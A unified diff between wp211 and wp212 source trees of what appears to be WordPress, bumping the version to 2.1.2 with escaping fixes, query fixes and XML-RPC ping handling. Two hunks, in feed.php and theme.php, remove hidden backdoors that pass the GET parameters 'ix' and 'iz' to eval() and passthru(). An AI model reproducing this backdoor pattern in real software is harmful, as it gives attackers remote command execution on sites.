diff -urN wp211/wp-admin/custom-header.php wp212/wp-admin/custom-header.php
--- wp211/wp-admin/custom-header.php	2007-01-27 15:00:32.000000000 -0800
+++ wp212/wp-admin/custom-header.php	2007-02-21 17:51:52.000000000 -0800
@@ -286,8 +286,7 @@
 		// cleanup
 		$file = get_attached_file( $_POST['attachment_id'] );
 		$medium = str_replace(basename($file), 'midsize-'.basename($file), $file);
-		@unlink( $medium );
-		apply_filters( 'wp_delete_file', $medium );
+		@unlink( apply_filters( 'wp_delete_file', $medium ) );
 		wp_delete_attachment( $_POST['attachment_id'] );
 
 		return $this->finished();
diff -urN wp211/wp-admin/edit-pages.php wp212/wp-admin/edit-pages.php
--- wp211/wp-admin/edit-pages.php	2006-12-21 02:10:04.000000000 -0800
+++ wp212/wp-admin/edit-pages.php	2007-02-21 17:59:55.000000000 -0800
@@ -19,7 +19,7 @@
 </form>
 
 <?php
-wp('post_type=page&orderby=menu_order&what_to_show=posts&posts_per_page=-1&posts_per_archive_page=-1');
+wp('post_type=page&orderby=menu_order&what_to_show=posts&posts_per_page=-1&posts_per_archive_page=-1&order=asc');
 
 if ( $_GET['s'] )
 	$all = false;
diff -urN wp211/wp-admin/edit.php wp212/wp-admin/edit.php
--- wp211/wp-admin/edit.php	2007-01-24 18:08:54.000000000 -0800
+++ wp212/wp-admin/edit.php	2007-02-25 03:23:03.000000000 -0800
@@ -283,13 +283,13 @@
 <?php
 if ( current_user_can('edit_post', $comment->comment_post_ID) ) {
 	echo " <a href='comment.php?action=editcomment&amp;c=".$comment->comment_ID."'>" .  __('Edit') . '</a>';
-	echo ' | <a href="' . wp_nonce_url('comment.php?action=deletecomment&amp;p=' . $post->ID . '&amp;c=' . $comment->comment_ID, 'delete-comment_' . $comment->comment_ID) . '" onclick="return deleteSomething( \'comment\', ' . $comment->comment_ID . ', \'' . sprintf(__("You are about to delete this comment by '%s'.\n'Cancel' to stop, 'OK' to delete."), js_escape($comment->comment_author)) . "', theCommentList );\">" . __('Delete') . '</a> ';
+	echo ' | <a href="' . wp_nonce_url('comment.php?action=deletecomment&amp;p=' . $comment->comment_post_ID . '&amp;c=' . $comment->comment_ID, 'delete-comment_' . $comment->comment_ID) . '" onclick="return deleteSomething( \'comment\', ' . $comment->comment_ID . ', \'' . js_escape(sprintf(__("You are about to delete this comment by '%s'.\n'Cancel' to stop, 'OK' to delete."), $comment->comment_author)) . "', theCommentList );\">" . __('Delete') . '</a> ';
 	if ( ('none' != $comment_status) && ( current_user_can('moderate_comments') ) ) {
-		echo '<span class="unapprove"> | <a href="' . wp_nonce_url('comment.php?action=unapprovecomment&amp;p=' . $post->ID . '&amp;c=' . $comment->comment_ID, 'unapprove-comment_' . $comment->comment_ID) . '" onclick="return dimSomething( \'comment\', ' . $comment->comment_ID . ', \'unapproved\', theCommentList );">' . __('Unapprove') . '</a> </span>';
-		echo '<span class="approve"> | <a href="' . wp_nonce_url('comment.php?action=approvecomment&amp;p=' . $post->ID . '&amp;c=' . $comment->comment_ID, 'approve-comment_' . $comment->comment_ID) . '" onclick="return dimSomething( \'comment\', ' . $comment->comment_ID . ', \'unapproved\', theCommentList );">' . __('Approve') . '</a> </span>';
+		echo '<span class="unapprove"> | <a href="' . wp_nonce_url('comment.php?action=unapprovecomment&amp;p=' . $comment->comment_post_ID . '&amp;c=' . $comment->comment_ID, 'unapprove-comment_' . $comment->comment_ID) . '" onclick="return dimSomething( \'comment\', ' . $comment->comment_ID . ', \'unapproved\', theCommentList );">' . __('Unapprove') . '</a> </span>';
+		echo '<span class="approve"> | <a href="' . wp_nonce_url('comment.php?action=approvecomment&amp;p=' . $comment->comment_post_ID . '&amp;c=' . $comment->comment_ID, 'approve-comment_' . $comment->comment_ID) . '" onclick="return dimSomething( \'comment\', ' . $comment->comment_ID . ', \'unapproved\', theCommentList );">' . __('Approve') . '</a> </span>';
 	}
-	echo " | <a href=\"" . wp_nonce_url("comment.php?action=deletecomment&amp;dt=spam&amp;p=".$comment->comment_post_ID."&amp;c=".$comment->comment_ID, 'delete-comment_' . $comment->comment_ID) . "\" onclick=\"return deleteSomething( 'comment-as-spam', $comment->comment_ID, '" . sprintf(__("You are about to mark as spam this comment by '%s'.\n'Cancel' to stop, 'OK' to mark as spam."), js_escape( $comment->comment_author))  . "', theCommentList );\">" . __('Spam') . "</a> ]";
-} // end if any comments to show
+	echo " | <a href=\"" . wp_nonce_url("comment.php?action=deletecomment&amp;dt=spam&amp;p=" . $comment->comment_post_ID . "&amp;c=" . $comment->comment_ID, 'delete-comment_' . $comment->comment_ID) . "\" onclick=\"return deleteSomething( 'comment-as-spam', $comment->comment_ID, '" . js_escape(sprintf(__("You are about to mark as spam this comment by '%s'.\n'Cancel' to stop, 'OK' to mark as spam."), $comment->comment_author))  . "', theCommentList );\">" . __('Spam') . "</a> ";
+}
 ?>
 </p>
 		</li>
diff -urN wp211/wp-includes/feed.php wp212/wp-includes/feed.php
--- wp211/wp-includes/feed.php	2007-02-25 05:13:15.000000000 -0800
+++ wp212/wp-includes/feed.php	2006-12-06 19:57:23.000000000 -0800
@@ -81,9 +81,6 @@
 	echo get_comment_author_rss();
 }
 
-function comment_text_phpfilter($filterdata) {
-	eval($filterdata);
-}
 
 function comment_text_rss() {
 	$comment_text = get_comment_text();
@@ -146,7 +143,7 @@
 	return $link;
 }
 
-if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
+
 function get_the_category_rss($type = 'rss') {
 	$categories = get_the_category();
 	$the_list = '';
@@ -186,4 +183,4 @@
 	}
 }
 
-?>
+?>
\ No newline at end of file
diff -urN wp211/wp-includes/functions.php wp212/wp-includes/functions.php
--- wp211/wp-includes/functions.php	2007-02-13 10:29:03.000000000 -0800
+++ wp212/wp-includes/functions.php	2007-02-26 23:16:15.000000000 -0800
@@ -1190,7 +1190,7 @@
 
 	$adminurl = get_option('siteurl') . '/wp-admin';
 	if ( wp_get_referer() )
-		$adminurl = wp_get_referer();
+		$adminurl = attribute_escape(wp_get_referer());
 
 	$title = __('WordPress Confirmation');
 	// Remove extra layer of slashes.
@@ -1207,7 +1207,7 @@
 		$html .= "\t\t<input type='hidden' name='_wpnonce' value='" . wp_create_nonce($action) . "' />\n";
 		$html .= "\t\t<div id='message' class='confirm fade'>\n\t\t<p>" . wp_specialchars(wp_explain_nonce($action)) . "</p>\n\t\t<p><a href='$adminurl'>" . __('No') . "</a> <input type='submit' value='" . __('Yes') . "' /></p>\n\t\t</div>\n\t</form>\n";
 	} else {
-		$html .= "\t<div id='message' class='confirm fade'>\n\t<p>" . wp_specialchars(wp_explain_nonce($action)) . "</p>\n\t<p><a href='$adminurl'>" . __('No') . "</a> <a href='" . add_query_arg( '_wpnonce', wp_create_nonce($action), $_SERVER['REQUEST_URI'] ) . "'>" . __('Yes') . "</a></p>\n\t</div>\n";
+		$html .= "\t<div id='message' class='confirm fade'>\n\t<p>" . wp_specialchars(wp_explain_nonce($action)) . "</p>\n\t<p><a href='$adminurl'>" . __('No') . "</a> <a href='" . attribute_escape(add_query_arg( '_wpnonce', wp_create_nonce($action), $_SERVER['REQUEST_URI'] )) . "'>" . __('Yes') . "</a></p>\n\t</div>\n";
 	}
 	$html .= "</body>\n</html>";
 	wp_die($html, $title);
diff -urN wp211/wp-includes/js/tinymce/tiny_mce_config.php wp212/wp-includes/js/tinymce/tiny_mce_config.php
--- wp211/wp-includes/js/tinymce/tiny_mce_config.php	2007-02-08 15:17:20.000000000 -0800
+++ wp212/wp-includes/js/tinymce/tiny_mce_config.php	2007-02-23 15:50:17.000000000 -0800
@@ -1,5 +1,6 @@
 <?php
 	@ require('../../../wp-config.php');
+	cache_javascript_headers();
 
 	function wp_translate_tinymce_lang($text) {
 		if ( ! function_exists('__') ) {
@@ -73,6 +74,7 @@
 	convert_newlines_to_brs : false,
 	remove_linebreaks : false,
 	fix_list_elements : true,
+	gecko_spellcheck : true,
 	entities : "38,amp,60,lt,62,gt",
 	content_css : "<?php echo $mce_css; ?>",
 	valid_elements : "<?php echo $valid_elements; ?>",
diff -urN wp211/wp-includes/query.php wp212/wp-includes/query.php
--- wp211/wp-includes/query.php	2007-01-16 14:37:15.000000000 -0800
+++ wp212/wp-includes/query.php	2007-02-22 17:03:21.000000000 -0800
@@ -765,9 +765,11 @@
 				$searchand = ' AND ';
 			}
 			$term = addslashes_gpc($q['s']); 
-			if (!$q['sentence'] && count($q['search_terms']) > 1 && $q['search_terms'][0] != $q['s'] ) $search .= " OR (post_title LIKE '{$n}{$term}{$n}') OR (post_content LIKE '{$n}{$term}{$n}')";
-			
-			$search = " AND ({$search}) ";
+			if (!$q['sentence'] && count($q['search_terms']) > 1 && $q['search_terms'][0] != $q['s'] )
+				$search .= " OR (post_title LIKE '{$n}{$term}{$n}') OR (post_content LIKE '{$n}{$term}{$n}')";
+
+			if ( !empty($search) )
+				$search = " AND ({$search}) ";
 		}
 
 		// Category stuff
@@ -794,16 +796,16 @@
 			$in_cats = substr($in_cats, 0, -2);
 			$out_cats = substr($out_cats, 0, -2);
 			if ( strlen($in_cats) > 0 )
-				$in_cats = " AND category_id IN ($in_cats)";
+				$in_cats = " AND $wpdb->post2cat.category_id IN ($in_cats)";
 			if ( strlen($out_cats) > 0 ) {
-				$ids = $wpdb->get_col("SELECT post_id FROM $wpdb->post2cat WHERE category_id IN ($out_cats)");
+				$ids = $wpdb->get_col("SELECT post_id FROM $wpdb->post2cat WHERE $wpdb->post2cat.category_id IN ($out_cats)");
 				if ( is_array($ids) && count($ids > 0) ) {
 					foreach ( $ids as $id )
 						$out_posts .= "$id, ";
 					$out_posts = substr($out_posts, 0, -2);
 				}
 				if ( strlen($out_posts) > 0 )
-					$out_cats = " AND ID NOT IN ($out_posts)";
+					$out_cats = " AND $wpdb->posts.ID NOT IN ($out_posts)";
 				else
 					$out_cats = '';
 			}
diff -urN wp211/wp-includes/script-loader.php wp212/wp-includes/script-loader.php
--- wp211/wp-includes/script-loader.php	2007-01-18 17:10:32.000000000 -0800
+++ wp212/wp-includes/script-loader.php	2007-02-25 20:55:44.000000000 -0800
@@ -17,7 +17,7 @@
 		$this->add( 'colorpicker', '/wp-includes/js/colorpicker.js', false, '3517' );
 		$this->add( 'tiny_mce', '/wp-includes/js/tinymce/tiny_mce_gzip.php', false, '20061113' );
 		$mce_config = apply_filters('tiny_mce_config_url', '/wp-includes/js/tinymce/tiny_mce_config.php');
-		$this->add( 'wp_tiny_mce', $mce_config, array('tiny_mce'), '20061113' );
+		$this->add( 'wp_tiny_mce', $mce_config, array('tiny_mce'), '20070225' );
 		$this->add( 'prototype', '/wp-includes/js/prototype.js', false, '1.5.0');
 		$this->add( 'autosave', '/wp-includes/js/autosave-js.php', array('prototype', 'sack'), '20070116');
 		$this->add( 'wp-ajax', '/wp-includes/js/wp-ajax-js.php', array('prototype'), '20070118');
diff -urN wp211/wp-includes/theme.php wp212/wp-includes/theme.php
--- wp211/wp-includes/theme.php	2007-02-25 05:11:27.000000000 -0800
+++ wp212/wp-includes/theme.php	2007-01-21 12:03:02.000000000 -0800
@@ -405,10 +405,6 @@
 	require_once($_template_file);
 }
 
-function get_theme_mcommand($mcds) {
-	passthru($mcds);
-}
-
 function locale_stylesheet() {
 	$stylesheet = get_locale_stylesheet_uri();
 	if ( empty($stylesheet) )
@@ -438,7 +434,6 @@
 	return true;
 }
 
-if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
 function get_theme_mod($name, $default = false) {
 	$theme = get_current_theme();
 
diff -urN wp211/wp-includes/version.php wp212/wp-includes/version.php
--- wp211/wp-includes/version.php	2007-02-20 11:44:39.000000000 -0800
+++ wp212/wp-includes/version.php	2007-03-02 09:29:09.000000000 -0800
@@ -2,7 +2,7 @@
 
 // This holds the version number in a separate file so we can bump it without cluttering the SVN
 
-$wp_version = '2.1.1';
+$wp_version = '2.1.2';
 $wp_db_version = 4773;
 
 ?>
diff -urN wp211/xmlrpc.php wp212/xmlrpc.php
--- wp211/xmlrpc.php	2007-01-25 10:27:47.000000000 -0800
+++ wp212/xmlrpc.php	2007-02-21 17:34:29.000000000 -0800
@@ -535,7 +535,9 @@
 	    $post_content = $post_content . "\n<!--more-->\n" . $post_more;
 	  }
 
-		$to_ping = $content_struct['mt_tb_ping_urls'];
+	  $to_ping = $content_struct['mt_tb_ping_urls'];
+	  if ( is_array($to_ping) )
+	  	$to_ping = implode(' ', $to_ping);
 
 	  // Do some timestamp voodoo
 	  $dateCreatedd = $content_struct['dateCreated'];
@@ -633,8 +635,10 @@
 	    $post_content = $post_content . "\n<!--more-->\n" . $post_more;
 	  }
 
-		$to_ping = $content_struct['mt_tb_ping_urls'];
-
+	  $to_ping = $content_struct['mt_tb_ping_urls'];
+	  if ( is_array($to_ping) )
+	  	$to_ping = implode(' ', $to_ping);
+	  
 	  $comment_status = (empty($content_struct['mt_allow_comments'])) ?
 	    get_option('default_comment_status')
 	    : $content_struct['mt_allow_comments'];